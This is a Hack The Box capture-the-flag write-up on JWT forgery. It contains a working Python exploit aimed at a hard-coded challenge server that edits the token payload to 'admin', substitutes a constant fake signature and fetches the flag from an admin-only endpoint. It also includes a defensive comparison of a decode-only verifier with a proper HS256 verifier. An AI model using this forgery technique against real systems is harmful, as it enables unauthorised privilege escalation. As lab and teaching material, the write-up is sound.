
HackTheBox Read Before You Sign Writeup

Explore the basics of web authentication in the Read Before You Sign Challenge on Hack The Box. This easy-level Challenge introduces JSON Web Token (JWT) forgery in a clear and accessible way: a regular user's token is base64url-decoded, its payload is edited, and its signature is swapped for a constant, yet the server still accepts it. It is a good first exercise in why signature verification matters.

Proof of Concept (PoC)

import re
import sys
import requests
from base64 import urlsafe_b64encode, urlsafe_b64decode

URL = 'http://94.237.63.109:34129'


def b64url_decode(segment):
    # JWT segments are base64url (not plain base64) with the '=' padding stripped;
    # restore the padding before decoding so any segment length decodes cleanly
    return urlsafe_b64decode(segment + '=' * (-len(segment) % 4))


def craft_admin_token(jwt):
    # Keep the header untouched, edit the payload, and replace the signature
    header, payload, _signature = jwt.split('.')
    # Blindly swap every "user" for "admin" in the decoded JSON payload (as the PoC relies on)
    forged_payload = b64url_decode(payload).replace(b'user', b'admin')
    part2 = urlsafe_b64encode(forged_payload).decode().rstrip('=')
    # The server accepts this fixed third segment in place of a real signature. It decodes to
    # the bytes 30 06 02 01 00 02 01 00: an ASN.1 SEQUENCE holding two INTEGER values of 0.
    part3 = 'MAYCAQACAQA'
    return '.'.join([header, part2, part3])


def register_user():
    # Registration may fail if the account already exists; the login below still works then
    requests.post(f'{URL}/register', json={"username": "htb_user", "password": "htb_user", "email": "user@htb.eu"})


def get_user_jwt_token():
    response = requests.post(f'{URL}/login', json={"username": "htb_user", "password": "htb_user"})
    response.raise_for_status()
    return response.json()['token']


def send_admin_token(token):
    # /list is restricted to admins; the app reads the JWT from the 'token' cookie
    admin_r = requests.get(f'{URL}/list', cookies={'token': token})
    match = re.search(r'HTB\{.*?\}', admin_r.text)
    if match is None:
        sys.exit(f'No flag in response (HTTP {admin_r.status_code}); the forged token was probably rejected')
    return match.group(0)


if __name__ == '__main__':
    register_user()
    jwt = get_user_jwt_token()
    admin_token = craft_admin_token(jwt)
    flag = send_admin_token(admin_token)
    print(flag)

Summary

Read Before You Sign Challenge on Hack The Box involves exploiting JSON Web Token (JWT) manipulation to escalate privileges. The PoC registers a standard user, logs in to obtain that user's JWT, base64url-decodes the payload segment, rewrites user to admin, re-encodes it, and replaces the signature segment with a fixed string. The crafted token is then sent in the token cookie to the admin-only /list endpoint, which returns the flag. Because the payload was changed and the signature was not recomputed with any key, a correct verifier would have rejected the token; the fact that the server accepts it shows that its signature check is ineffective, which is the core weakness this challenge demonstrates.
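To make the failure concrete, here is an added example (not code from the challenge or from the original post) that places a decode-only verifier, which is what the challenge server effectively behaves like, next to a proper HS256 verifier. The secret key, the payload fields (username, role) and the helper names are assumptions made for this illustration; the forged-signature constant is the one used in the PoC above. The forge_role helper mirrors the PoC's approach of editing the payload bytes without re-signing.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key; a real deployment keeps this in a secrets store
DEMO_KEY = b'constructed-demo-key-do-not-reuse'
# The constant third segment the PoC sends instead of a real signature
POC_FAKE_SIGNATURE = 'MAYCAQACAQA'


def b64url_encode(raw: bytes) -> str:
    # JWT segments are base64url with the trailing '=' padding removed
    return base64.urlsafe_b64encode(raw).rstrip(b'=').decode()


def b64url_decode(segment: str) -> bytes:
    # Restore padding so segments of any length decode
    return base64.urlsafe_b64decode(segment + '=' * (-len(segment) % 4))


def sign_hs256(payload: dict, key: bytes) -> str:
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = '.'.join([
        b64url_encode(json.dumps(header, separators=(',', ':')).encode()),
        b64url_encode(json.dumps(payload, separators=(',', ':')).encode()),
    ])
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f'{signing_input}.{b64url_encode(sig)}'


def decode_unverified(token: str) -> dict:
    # Vulnerable pattern: trusts the payload without looking at the signature at all.
    # Any client can edit the claims and the server will believe them.
    return json.loads(b64url_decode(token.split('.')[1]))


def verify_hs256(token: str, key: bytes) -> Optional[dict]:
    # Hardened pattern: pin the algorithm, recompute the MAC over header.payload,
    # and compare in constant time before trusting any claim
    parts = token.split('.')
    if len(parts) != 3:
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
        given_sig = b64url_decode(parts[2])
    except ValueError:
        return None
    if header.get('alg') != 'HS256':
        return None  # refuses alg switching and "none"
    expected_sig = hmac.new(key, f'{parts[0]}.{parts[1]}'.encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected_sig, given_sig):
        return None  # also False when the lengths differ, e.g. the 8-byte PoC constant
    return json.loads(b64url_decode(parts[1]))


def forge_role(token: str, signature: Optional[str] = None) -> str:
    # What the PoC does: decode the payload, swap the role, re-encode, and either keep
    # the old signature or substitute a constant. No key is involved.
    header, payload, old_sig = token.split('.')
    edited = b64url_decode(payload).replace(b'"user"', b'"admin"')
    return '.'.join([header, b64url_encode(edited), signature or old_sig])


if __name__ == '__main__':
    token = sign_hs256({"username": "htb_user", "role": "user"}, DEMO_KEY)
    forged = forge_role(token, POC_FAKE_SIGNATURE)
    print('decode-only verifier sees role:', decode_unverified(forged)['role'])
    print('HS256 verifier accepts forged token:', verify_hs256(forged, DEMO_KEY) is not None)
```

Run it and the decode-only path reports role admin for the forged token while verify_hs256 returns None for it; the genuine token passes the HS256 check, which is the behaviour the challenge server lacked.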

This post is licensed under CC BY 4.0 by the author.